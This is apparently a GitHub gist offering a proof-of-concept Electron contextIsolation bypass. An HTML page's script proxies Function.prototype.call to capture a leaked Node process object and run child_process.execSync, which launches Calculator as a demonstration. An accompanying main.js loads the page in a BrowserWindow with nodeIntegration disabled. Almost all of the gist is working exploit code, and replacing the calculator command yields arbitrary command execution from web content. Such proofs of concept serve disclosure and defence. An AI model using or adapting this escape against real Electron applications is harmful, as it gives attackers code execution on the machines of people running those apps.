Skip to content

Instantly share code, notes, and snippets.

@matt-
Last active November 15, 2023 02:51
Show Gist options
  • Save matt-/2b31b5cca3c52cfb59e1a33b4665719c to your computer and use it in GitHub Desktop.
Save matt-/2b31b5cca3c52cfb59e1a33b4665719c to your computer and use it in GitHub Desktop.
Electron contextIsolation POC
<!DOCTYPE html>
<html>
<head>
<script>
var proc = false;
Function.prototype.call= new Proxy(Function.prototype.call, {
apply: function(target, thisArg, argumentsList) {
console.log(thisArg)
if(!proc){
proc = argumentsList.find(function(element) { // check all arguments for process
if(element.pid){
return element;
}
});
if(proc){ // this is probably a process ref
//document.write(proc.pid)
if(proc.platform === "win32"){
proc.mainModule.require('child_process').execSync('calc');
}else{
proc.mainModule.require('child_process').execSync('open /Applications/Calculator.app');
}
}
}
var ret = Reflect.apply(target, thisArg, argumentsList);
return ret
}
});
</script>
</head>
<body>
<a href="#" onclick="location.href='about:blank';"><h1>Click</h1></a>
</body>
</html>
// Modules to control application life and create native browser window
const {app, BrowserWindow} = require('electron')
// Keep a global reference of the window object, if you don't, the window will
// be closed automatically when the JavaScript object is garbage collected.
let mainWindow
function createWindow () {
// Create the browser window.
mainWindow = new BrowserWindow(
{
width: 800,
height: 600,
"webPreferences": {
//"preload": `${__dirname}/renderer.js`,
"nodeIntegration": false,
"nativeWindowOpen": true
}
}
);
// and load the index.html of the app.
mainWindow.loadURL(`file://${__dirname}/index.html`);// this could be remote content
mainWindow.webContents.openDevTools()
// Open the DevTools.
// mainWindow.webContents.openDevTools()
// Emitted when the window is closed.
mainWindow.on('closed', function () {
// Dereference the window object, usually you would store windows
// in an array if your app supports multi windows, this is the time
// when you should delete the corresponding element.
mainWindow = null
})
}
// This method will be called when Electron has finished
// initialization and is ready to create browser windows.
// Some APIs can only be used after this event occurs.
app.on('ready', createWindow)
// Quit when all windows are closed.
app.on('window-all-closed', function () {
// On OS X it is common for applications and their menu bar
// to stay active until the user quits explicitly with Cmd + Q
if (process.platform !== 'darwin') {
app.quit()
}
})
app.on('activate', function () {
// On OS X it's common to re-create a window in the app when the
// dock icon is clicked and there are no other windows open.
if (mainWindow === null) {
createWindow()
}
})
// In this file you can include the rest of your app's specific main process
// code. You can also put them in separate files and require them here.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment